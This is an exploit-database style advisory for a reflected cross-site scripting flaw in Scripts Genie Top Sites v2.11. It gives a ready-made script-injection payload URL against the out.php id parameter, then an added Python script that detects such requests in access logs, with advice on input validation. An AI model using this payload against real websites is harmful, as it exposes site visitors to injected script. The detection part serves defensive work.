# Exploit Title: Scripts Genie Top Sites v2.11 <= Remote XSS Vulnerability
# Date: 26/02/2013
# Author: The Black Devils
# Software Link: http://scriptsgenie.com/index.php?do=catalog&c=scripts&i=top_site_script
# Demo : http://scriptsgenie.com/demo/toplist.2.11/toplist/index.php
# Category : [ webapps ]
# Dork : [ n / a ]
# Type : php
# Tested on: [Windows]
Tested on: Microsoft Windows Sp2
Apache 2.4.2 (Win32)
PHP 5.4.4
MySQL 5.5.25a
This vulnerability was discovered and researched by The Black Devils
[~] XSS Injection on Demo Site (/out.php?id=)
>>> http://server/out.php?id='"><script>alert(1337);</script>'
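A detection check for the parameter above, as an added example that is not part of the original advisory: it scans web-server access logs for `out.php` requests whose `id` value is not a plain number, decoding repeated percent-encoding first. The Apache log format, the numeric-id rule, the function names and the sample log lines are assumptions made for this example.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Assumption: Apache common/combined access-log format (request line in quotes).
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Assumption: legitimate ids are short decimal integers; the advisory does not say.
VALID_ID_RE = re.compile(r"\d{1,10}")

# Constructed sample log lines (documentation IP ranges), not captured traffic.
SAMPLE_LOG = [
    '192.0.2.10 - - [26/Feb/2013:10:00:01 +0000] "GET /out.php?id=42 HTTP/1.1" 302 -',
    '198.51.100.7 - - [26/Feb/2013:10:00:05 +0000] "GET /out.php?id=%27%22%3E'
    '%3Cscript%3Ealert(1337)%3B%3C/script%3E%27 HTTP/1.1" 200 512',
    '192.0.2.10 - - [26/Feb/2013:10:00:09 +0000] "GET /index.php?id=%3Cb%3E HTTP/1.1" 200 1024',
    '198.51.100.7 - - [26/Feb/2013:10:00:12 +0000] "GET /toplist/out.php?id='
    '%2527%2522%253Cb%253E HTTP/1.1" 200 512',
]

def fully_decode(value, max_rounds=3):
    """Undo repeated percent-encoding so double-encoded markup is still seen."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def suspicious_out_requests(log_lines):
    """Return (line_number, decoded_id) for out.php requests with a non-numeric id."""
    hits = []
    for lineno, line in enumerate(log_lines, 1):
        match = REQUEST_RE.search(line)
        if not match:
            continue
        url = urlsplit(match.group(1))
        if not url.path.lower().endswith("/out.php"):
            continue
        # parse_qs decodes once; fully_decode catches further encoding layers.
        for raw in parse_qs(url.query, keep_blank_values=True).get("id", []):
            value = fully_decode(raw)
            if not VALID_ID_RE.fullmatch(value):
                hits.append((lineno, value))
    return hits

if __name__ == "__main__":
    for lineno, value in suspicious_out_requests(SAMPLE_LOG):
        print(f"line {lineno}: suspicious id={value!r}")
```

The same allow-list rule (digits only) is what the application itself should enforce on `id` before using it, together with HTML-encoding anything echoed back into the page.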
-----------
Contact:
# Youtube : www.youtube.com/user/Th3BlackDevils
# Facebook : www.facebook.com/DevilsDz
# Email : mr.k4rizma@gmail.com